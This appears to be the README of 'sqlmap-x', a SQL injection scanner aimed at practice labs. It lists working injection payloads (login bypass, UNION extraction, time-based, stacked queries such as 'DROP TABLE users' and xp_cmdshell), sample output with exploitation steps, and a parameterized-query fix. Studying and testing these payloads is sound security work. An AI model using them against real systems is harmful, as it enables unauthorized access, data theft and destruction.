by R0b3rt0 (Robert Mwatua) | 🛡️ Professional Security Assessment Tool
🚀 A professional-grade, multi-threaded SQL injection detection framework that thinks like a real attacker. Features WAF detection, crawling, GET/POST injection, login bypass testing, and comprehensive reporting with attacker-style exploitation guidance.
Compatible with: DVWA · WebGoat · HackTheBox · TryHackMe · VulnBank · bWAPP · PentesterLab
| Category | Capabilities |
|---|---|
| 🧠 Detection Methods | Error-based, Boolean-based, Time-based, Union-based, Login Bypass, Stacked Queries, Second-Order |
| 🕷️ Discovery | Web crawling (depth 1-3), Form auto-detection, GET parameter extraction |
| 🛡️ WAF Detection | Cloudflare, ModSecurity, AWS WAF, Akamai, Imperva, Sucuri, Barracuda, F5, Wordfence, Fortinet |
| 🔄 Performance | Multi-threaded (1-10 threads), Configurable delays, User-Agent rotation |
| 📊 Reporting | JSON + HTML reports, Severity scoring (CRITICAL/HIGH/MEDIUM), Exploitation guidance |
| 🎯 Login Bypass | 25+ authentication bypass payloads (admin' --, OR 1=1, UNION bypass, etc.) |
| 🔐 Stealth | Random delays, Proxy support, Custom headers, Auth tokens |
```bash
# 1. Clone the repository
git clone https://github.com/Robertmwatua/sqlmap-x.git
cd sqlmap-x

# 2. Create virtual environment (recommended)
python3 -m venv sqlmap_env
source sqlmap_env/bin/activate  # On Windows: sqlmap_env\Scripts\activate

# 3. Install dependencies
pip install -r requirements.txt

# 4. Run the tool
python sqli_detector.py
```
## 🚀 Quick Start

```bash
# Interactive wizard (recommended)
python sqli_detector.py

# Example target: OWASP DVWA
# Enter: http://localhost:8080/vulnerabilities/sqli/
# Crawl: y | Depth: 2 | Threads: 3 | Delay: 0.2
```
## 🎯 Detection Capabilities

### 1. Authentication Bypass (CRITICAL)

```sql
admin' --
admin' #
' OR '1'='1
admin' OR 1=1--
' UNION SELECT NULL--
```

### 2. Error-Based SQLi (HIGH)

```sql
' AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT database())))--
' AND 1=CONVERT(int,@@version)--
' AND 1=TO_NUMBER(''')--
```

### 3. Time-Based Blind SQLi (HIGH)

```sql
' OR SLEEP(5)--
' AND IF(1=1,SLEEP(3),0)--
'; WAITFOR DELAY '00:00:05'--
```

### 4. Union-Based SQLi (CRITICAL)

```sql
' UNION SELECT NULL--
' UNION SELECT @@version,database()--
' UNION SELECT user(),NULL,NULL--
```

### 5. Boolean-Based Blind SQLi (MEDIUM)

```sql
' AND 1=1--
' AND 1=2--
' OR '1'='1
```

### 6. Stacked Queries (HIGH)

```sql
'; DROP TABLE users--
'; SELECT SLEEP(3)--
'; EXEC xp_cmdshell('whoami')--
```
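
Why the authentication-bypass payloads in section 1 rate CRITICAL, and the fix that leaves a scanner with nothing to report, shown as an added example (not code from sqlmap-x). It assumes an in-memory SQLite `users` table with a constructed credential; the function names and table layout are hypothetical.

```python
import sqlite3

# Payloads copied from the "Authentication Bypass" list above
# (the ones whose syntax SQLite accepts).
PAYLOADS = ["admin' --", "' OR '1'='1", "admin' OR 1=1--"]

def make_db():
    """Constructed sample data; a real application stores password hashes."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('admin', 'constructed-secret')")
    return db

def login_concat(db, username, password):
    """Vulnerable: user input becomes part of the SQL text."""
    query = ("SELECT username FROM users WHERE username = '" + username
             + "' AND password = '" + password + "'")
    try:
        row = db.execute(query).fetchone()
    except sqlite3.Error:
        return None  # malformed SQL is treated as a failed login
    return row[0] if row else None

def login_param(db, username, password):
    """Hardened: input is bound as data and never parsed as SQL."""
    row = db.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None

def bypasses(login_fn):
    """Return the payloads that authenticate when sent in both fields."""
    db = make_db()
    return [p for p in PAYLOADS if login_fn(db, p, p) is not None]

if __name__ == "__main__":
    print("concatenated query bypassed by:", bypasses(login_concat))
    print("parameterized query bypassed by:", bypasses(login_param))
```

With bound parameters the quote characters in each payload are compared as literal text, so the only way to authenticate is the real credential.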
```
sqlmap-x/
├── 🐍 sqli_detector.py      # Main tool (2000+ lines)
├── 📦 requirements.txt      # Dependencies
├── 📖 README.md             # Documentation
├── 📂 reports/              # Generated reports
│   ├── sqli_*.json          # JSON findings
│   └── sqli_*.html          # HTML report with guidance
└── ⚖️ LICENSE               # MIT License
```
```
┌─[ STEP 1 ]─ INITIALIZING ──────────────────────────────────────
  ✔ HTTP client ready
└────────────────────────────────────────────────────────────────
┌─[ STEP 2 ]─ WAF DETECTION ─────────────────────────────────────
  ✔ No WAF signatures detected
└────────────────────────────────────────────────────────────────
┌─[ STEP 3 ]─ DISCOVERY ─────────────────────────────────────────
  ✔ Crawled 12 page(s)
  ✔ Forms: 3 │ GET params: 8
└────────────────────────────────────────────────────────────────
┌─[ STEP 4 ]─ INJECTION TESTING ─────────────────────────────────
  » Testing form POST https://target.com/login
  ⚡ [CRITICAL] Authentication Bypass | field=username+password
  ⚡ [HIGH] Error-Based SQLi | field=username
  » Testing GET param [id] https://target.com/page?id=1
  ⚡ [HIGH] Union-Based SQLi (GET) | field=id
└────────────────────────────────────────────────────────────────
┌─[ STEP 5 ]─ REPORTS ───────────────────────────────────────────
  ✔ JSON → reports/sqli_20260413_143022.json
  ✔ HTML → reports/sqli_20260413_143022.html
└────────────────────────────────────────────────────────────────
╔══════════════════════════════════════════════════════════════╗
║ NEXT STEPS & EXPLOITATION GUIDANCE                           ║
╚══════════════════════════════════════════════════════════════╝
① LOGIN BYPASS CONFIRMED
┌─ Go to: https://target.com/login
│ In the username field enter:
│   admin' --
│ In the password field enter:
│   anything
│ Hit login — you should be authenticated as admin.
② UNION-BASED: DATA EXTRACTION
│ Confirmed column count: 2
│ Dump all tables:
│   id=' UNION SELECT group_concat(table_name),NULL FROM information_schema.tables--
══════════════════════════════════════════════════════════════════
SCAN COMPLETE
══════════════════════════════════════════════════════════════════
CRITICAL: 1
HIGH: 2
Total : 3
Forms : 3
GET params: 8
Duration : 45.23s
══════════════════════════════════════════════════════════════════
```